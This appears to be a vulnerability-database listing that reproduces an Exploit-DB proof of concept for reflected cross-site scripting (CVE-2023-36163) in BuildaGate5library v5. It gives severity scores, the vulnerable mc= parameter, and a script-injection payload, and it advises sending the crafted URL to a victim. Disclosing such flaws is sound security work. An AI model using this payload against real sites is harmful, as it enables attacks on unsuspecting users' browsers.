Lucene search
Idan MalihiEDB-ID:51581HistoryJul 11, 2023 - 12:00 a.m.
BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
2023-07-1100:00:00
Idan Malihi
www.exploit-db.com
123
reflected cross-site scripting
exploit
vendor homepage
cve-2023-36163
microsoft windows 10 pro
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.006 Low
EPSS
Percentile
78.1%
# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: None
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36163
#PoC:
An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
'><script>prompt("XSS");</script><div id="aa
After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.
#Payload:
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaaRelated
nvd
nvd
CVE-2023-36163
2023-07-11 14:15:09
zdt
zdt
BuildaGate5library v5 - Reflected Cross-Site Scripting Vulnerability
2023-07-11 00:00:00
cvelist
cvelist
CVE-2023-36163
2023-07-11 00:00:00
prion
prion
Cross site scripting
2023-07-11 14:15:00
cve
cve
CVE-2023-36163
2023-07-11 14:15:09
packetstorm
packetstorm
BuildaGate5 Cross Site Scripting
2023-07-11 00:00:00
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.006 Low
EPSS
Percentile
78.1%
Related for EDB-ID:51581